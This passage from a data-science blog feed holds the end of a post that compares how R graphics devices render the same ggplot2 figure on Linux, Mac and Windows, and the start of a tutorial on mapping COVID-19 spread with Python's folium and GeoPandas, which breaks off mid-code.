&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then create a graphic that has a few challenging aspects&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(df, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Anti-aliasing check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_abline&lt;/span&gt;(intercept &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, slope &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check &amp;amp; newline&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_label&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;This is italic text\n in Arial Narrow&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arial Narrow&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fontface &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, label.size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_bw&lt;/span&gt;(base_family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Times&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Font check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;( face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bold&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;italic&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(face &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plain&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Transparency&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(alpha &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="2020-r-graphics-ggplot2.png" style="width:400px; class:image-center"&gt;
&lt;p&gt;Many of the aspects of this test graphic have been taken from other blog posts. I’ve provided links at the end of this post&lt;/p&gt;
&lt;h2 id="the-challenge"&gt;The Challenge&lt;/h2&gt;
&lt;p&gt;The above graphic was created under all three operating systems, using the graphics drivers listed above. The complete script can be downloaded from this &lt;a href="https://gist.github.com/csgillespie/eaa334e7455d3bb2fe967f5dc8614853" rel="external"&gt;GitHub gist&lt;/a&gt;. In this post, I don’t care about file size or the speed of the graphics device. As most use cases for R graphics don’t really depend on a few KB or an extra second generating the graph, this seems a reasonable compromise for this test. All tests were performed using R 3.6.3 or R 3.6.2.&lt;/p&gt;
&lt;h3 id="grdevicespdf"&gt;grDevices::pdf()&lt;/h3&gt;
&lt;p&gt;All plots failed due to fonts. Interesting, the pdf version was 1.4, compared to 1.5 under other methods. Careful reading of the &lt;code&gt;pdf()&lt;/code&gt; help page suggests this is expected behaviour due to non-standard fonts. From the documentation, I’m pretty sure I could embed the necessary fonts in the PDF file. However, it seems clear that there are differences between OSs, so my fix under Linux, might not be cross-platform. Also if we change font, the issue would appear again.&lt;/p&gt;
&lt;h3 id="cairocairopdf"&gt;Cairo::CairoPDF()&lt;/h3&gt;
&lt;p&gt;Under all OSs, this function call executed without giving an error. However, there are severe font issues. The &lt;code&gt;x&lt;/code&gt; on each plot is different and the text from &lt;code&gt;geom_label()&lt;/code&gt; is different. Under Macs, it isn’t even in italics.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-CarioPDF.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;When we compare these graphics to the output from &lt;code&gt;cairo_pdf()&lt;/code&gt; and the different png functions, it appears that the output from &lt;code&gt;CairoPDF()&lt;/code&gt; is incorrect across all OSs.&lt;/p&gt;
&lt;p&gt;Also, using the &lt;code&gt;pdfinfo&lt;/code&gt; tool in Linux, each figure was created using a different version of Cairo: Windows (v1.10.2), Mac (v1.14.6) and Linux (v1.15.0).&lt;/p&gt;
&lt;h3 id="grdevicescairo_pdf"&gt;grDevices::cairo_pdf()&lt;/h3&gt;
&lt;p&gt;All generated PDFs look the same, but are not identical! They again use different versions of Cairo (ranging from v1.14.6 to v1.16.0) and so have different file sizes.&lt;/p&gt;
&lt;p&gt;If we compare &lt;code&gt;Cairo::CairoPDF()&lt;/code&gt; to &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; under Windows, we can see the graphics created are significantly different.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-CairoPDF-cairo_pdf-win.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Overall, if you are generating PDFs files then it’s clear you should use &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt; if you want any chance of your code working across different OSs.&lt;/p&gt;
&lt;h3 id="grdevicespng"&gt;grDevices::png()&lt;/h3&gt;
&lt;p&gt;The png function produces graphics under Linux and Mac. However, the placement of the text is slightly different, e.g. a few pixels. Under Windows, the font appears to be the default and not Times or Arial.&lt;/p&gt;
&lt;p&gt;Using the &lt;code&gt;pnginfo&lt;/code&gt; tool also highlights that the three PNGs differ by&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Colour Type: Linux: paletted (256 colours) vs Mac: RGB vs Windows: paletted (156 colours)&lt;/li&gt;
&lt;li&gt;Channels: 1 vs 4 vs 1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also under Windows, the graphic doesn’t use anti-aliasing. This is a technique for smoothing over pixels on straight lines. If we zoom into the line on Linux/Mac vs Windows we can see the “stair-case” effect.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-anti-aliasing.png" style="width:500px; class:image-center"&gt;
&lt;h3 id="grdevicespng-type--cairo"&gt;grDevices::png(…, type = “cairo”)&lt;/h3&gt;
&lt;p&gt;All OSs produce a graphic that looks similar. But placement of text still differs by a few pixels between the OSs - but it’s barely visible. The axes line looks lighter under Mac and &lt;code&gt;pnginfo&lt;/code&gt; indicates that colour type and channels differ.&lt;/p&gt;
&lt;img class="image-center" src="2020-r-graphics-cairo-comparison.png" style="width:450px; class:image-center"&gt;
&lt;h3 id="grdevicespng-type--cairo_png"&gt;grDevices::png(…, type = “cairo_png”)&lt;/h3&gt;
&lt;p&gt;All OSs produce a graphic that looks similar and text placement appears (to the naked eye) to be identical. Using &lt;code&gt;pnginfo&lt;/code&gt; indicates that colour type and channels are now the same.&lt;/p&gt;
&lt;h3 id="the-ragg-package"&gt;The {ragg} package&lt;/h3&gt;
&lt;p&gt;Linux, Mac &amp;amp; Windows produced a graphic that looked similar and &lt;code&gt;pnginfo&lt;/code&gt; indicates that all attributes were identical. However the linebreak in &lt;code&gt;geom_label()&lt;/code&gt; uncovered a &lt;a href="https://github.com/r-lib/ragg/issues/32" rel="external"&gt;bug&lt;/a&gt; in the {ragg} package, which was fixed a few days later.&lt;/p&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Overall, it appears that getting graphics to be identical across different OS’s is more difficult than one would first assume! For PDF plots, the least worst option is &lt;code&gt;grDevices::cairo_pdf()&lt;/code&gt;, this doesn’t produce identical graphics as there are different versions of Cairo in play, but this test indicts the graphics are very similar. Frustratingly, you would typically save your bar/line/scatter plot as a PDF due to the superior resolution. But it also appears this isn’t particularly well suited to being cross-platform.&lt;/p&gt;
&lt;p&gt;For PNG graphics, it’s clear you should always use the &lt;code&gt;type = &amp;quot;cairo_png&amp;quot;&lt;/code&gt; with the &lt;code&gt;png()&lt;/code&gt; function. However, I will be moving to the {ragg} package in the near future, especially as &lt;a href="https://github.com/rstudio/rstudio/pull/6539" rel="external"&gt;RStudio&lt;/a&gt; are incorporating it into their IDE. The &lt;a href="https://ragg.r-lib.org/articles/ragg_quality.html" rel="external"&gt;quality&lt;/a&gt; and &lt;a href="https://ragg.r-lib.org/articles/ragg_performance.html" rel="external"&gt;performance&lt;/a&gt; are impressive, and it’s goal is to produce identical cross-platform graphics.&lt;/p&gt;
&lt;p&gt;See our latest blog post on setting &lt;a href="https://www.jumpingrivers.com/blog/r-knitr-markdown-png-pdf-graphics/" rel="external"&gt;graphics devices&lt;/a&gt; inside an Rmarkdown document, for details on how to use cairo within knitr.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id="links-and-thanks"&gt;Links and thanks&lt;/h2&gt;
&lt;p&gt;This post used bits and pieces from a wide variety of sources. Hopefully, I’ve not forgotten anyone.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This post actually started with an e-conversation with Bob Rudis four years ago, which resulted in &lt;a href="https://github.com/hrbrmstr/r_device_tests" rel="external"&gt;this&lt;/a&gt; initial test.&lt;/li&gt;
&lt;li&gt;This &lt;a href="https://www.andrewheiss.com/blog/2017/09/27/working-with-r-cairo-graphics-custom-fonts-and-ggplot/" rel="external"&gt;post&lt;/a&gt; made me think about Cairo graphics.&lt;/li&gt;
&lt;li&gt;&lt;a href="http://gforge.se/2013/02/exporting-nice-plots-in-r/" rel="external"&gt;Another&lt;/a&gt; post on Cairo, with a look at anti-aliasing issues.&lt;/li&gt;
&lt;li&gt;Thanks to &lt;a href="https://www.flaticon.com/authors/pixel-perfect" rel="external"&gt;flaticon&lt;/a&gt; for nice OS images.&lt;/li&gt;
&lt;li&gt;A big thank you to &lt;a href="https://www.maynoothuniversity.ie/people/catherine-hurley" rel="external"&gt;Catherine Hurley&lt;/a&gt; for running the Mac tests.&lt;/li&gt;
&lt;li&gt;I don’t think I used this &lt;a href="http://zevross.com/blog/2017/06/19/tips-and-tricks-for-working-with-images-and-figures-in-r-markdown-documents/" rel="external"&gt;post&lt;/a&gt;, but I certainly read it. The post provides an excellent description for working with images and figures.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-graphics-cairo-png-pdf-saving/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Mapping the Spread of COVID-19 with Python</title><link>https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/</link><pubDate>Thu, 26 Mar 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/interactive-maps-python-covid-19-spread/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The purpose of this post isn&amp;rsquo;t to add new insight into the spread of the coronavirus - there are plenty of experts out there more qualified. Instead, our goal is to highlight how to construct simple, interactive visualisations using live data such as:&lt;/p&gt;
&lt;iframe title="My embedded document" width="100%" height="500" src="TimeSliderChoropleth2.html"&gt;&lt;/iframe&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-interactive-maps-python-covid-19-spread"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="getting-the-tools"&gt;Getting the tools&lt;/h2&gt;
&lt;p&gt;Folium is a Python library that allows you to create different types of interactive &lt;a href="https://leafletjs.com/" rel="external"&gt;Leaflet&lt;/a&gt; maps. Here, we are using the &lt;a href="https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset#covid_19_data.csv" rel="external"&gt;Novel Corona Virus 2019 Dataset&lt;/a&gt; to demonstrate how to make a choropleth (map) with a timeslider.&lt;/p&gt;
&lt;p&gt;We will be using the following libraries:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://python-visualization.github.io/branca/colormap.html" rel="external"&gt;branca.colormap&lt;/a&gt;, a utility module for dealing with colourmaps&lt;/li&gt;
&lt;li&gt;&lt;a href="https://python-visualization.github.io/folium/" rel="external"&gt;folium&lt;/a&gt;, a tool to visualize Python data on an interactive Leaflet map&lt;/li&gt;
&lt;li&gt;&lt;a href="https://geopandas.org/" rel="external"&gt;GeoPandas&lt;/a&gt;, an open source project to make working with geospatial data - in Python easier&lt;/li&gt;
&lt;li&gt;&lt;a href="https://numpy.org/" rel="external"&gt;NumPy&lt;/a&gt;, the fundamental package for scientific computing with Python&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pandas.pydata.org/" rel="external"&gt;pandas&lt;/a&gt;, a fast, powerful, flexible and easy to use data analysis and manipulation tool&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;branca.colormap&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;cm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;folium&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;geopandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;gpd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="preparing-the-data"&gt;Preparing the data&lt;/h2&gt;
&lt;p&gt;I’ve stored all my data in a directory called “python”. Using the &lt;strong&gt;pandas&lt;/strong&gt; library, we can read in the data via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#34;python/covid_19_data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SNo&lt;/th&gt;
&lt;th&gt;ObservationDate&lt;/th&gt;
&lt;th&gt;Province.State&lt;/th&gt;
&lt;th&gt;Country.Region&lt;/th&gt;
&lt;th&gt;Last.Update&lt;/th&gt;
&lt;th&gt;Confirmed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Anhui&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Beijing&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Chongqing&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Fujian&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Gansu&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;01/22/2020&lt;/td&gt;
&lt;td&gt;Guangdong&lt;/td&gt;
&lt;td&gt;Mainland China&lt;/td&gt;
&lt;td&gt;1/22/2020 17:00&lt;/td&gt;
&lt;td&gt;26&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;In order to map our data, we need a shapefile. A shapefile is a geospatial vector data format. The shapefile format can spatially describe vector features such as points, lines, and polygons. In our case, countries are represented as polygons. GeoPandas provides an inbuilt dataset of country shapes (&lt;code&gt;'naturalearth_lowres'&lt;/code&gt;), however this is missing some of the smaller countries that we require, such as Andorra. You can download the shapefiles that we used from &lt;a href="https://hub.arcgis.com/datasets/a21fdb46d23e4ef896f31475217cbb08_1" rel="external"&gt;here&lt;/a&gt;. We can read this file using GeoPandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;countries &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; gpd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_file(&lt;span style="color:#a5d6ff"&gt;&amp;#39;python/Countries_WGS84.shp&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;countries&lt;/code&gt; object looks very similar to a standard &lt;strong&gt;pandas&lt;/strong&gt; dataFrame. The only addition is a &lt;code&gt;geometry&lt;/code&gt; column containing (you guessed it) spatial information for that row. We can see here for Aruba, we have a polygon made up of several pairs of longitude and latitude.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;X&lt;/th&gt;
&lt;th&gt;OBJECTID&lt;/th&gt;
&lt;th&gt;CNTRY_NAME&lt;/th&gt;
&lt;th&gt;geometry&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Aruba&lt;/td&gt;
&lt;td&gt;POLYGON ((-69.8822326660156 12.4111099243165, -69.9469451904296 12.4366655349731, -70.0590362548828 12.5402078628541, -70.0596618652343 12.6277761459352, -70.0331954956055 12.6183319091797, -69.93223571777339 12.5280551910401, -69.89695739746089 12.4808330535889, -69.8914031982421 12.4722213745117, -69.88555908203131 12.4577770233155, -69.87486267089839 12.4152765274048, -69.8822326660156 12.4111099243165))&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;To be able to join the shapefile and the coronavirus data, we need to do edit some of the information in both files. Unfortunately, this is a rather manual process. First, we need to make sure that the country names match between the data and the shapefiles:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; :
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dict&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fromkeys([&lt;span style="color:#a5d6ff"&gt;&amp;#39;Taiwan&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Mainland China&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Hong Kong&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Macau&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;China&amp;#39;&lt;/span&gt;)})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;US&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United States&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;UK&amp;#39;&lt;/span&gt;},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;United Kingdom&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;corona_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; corona_df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;replace({&lt;span style="color:#a5d6ff"&gt;&amp;#39;Country/Region&amp;#39;&lt;/span&gt; : &lt;span style="color:#a5d6ff"&gt;&amp;#39;North Ireland&amp;#39;&lt;/span&gt;},
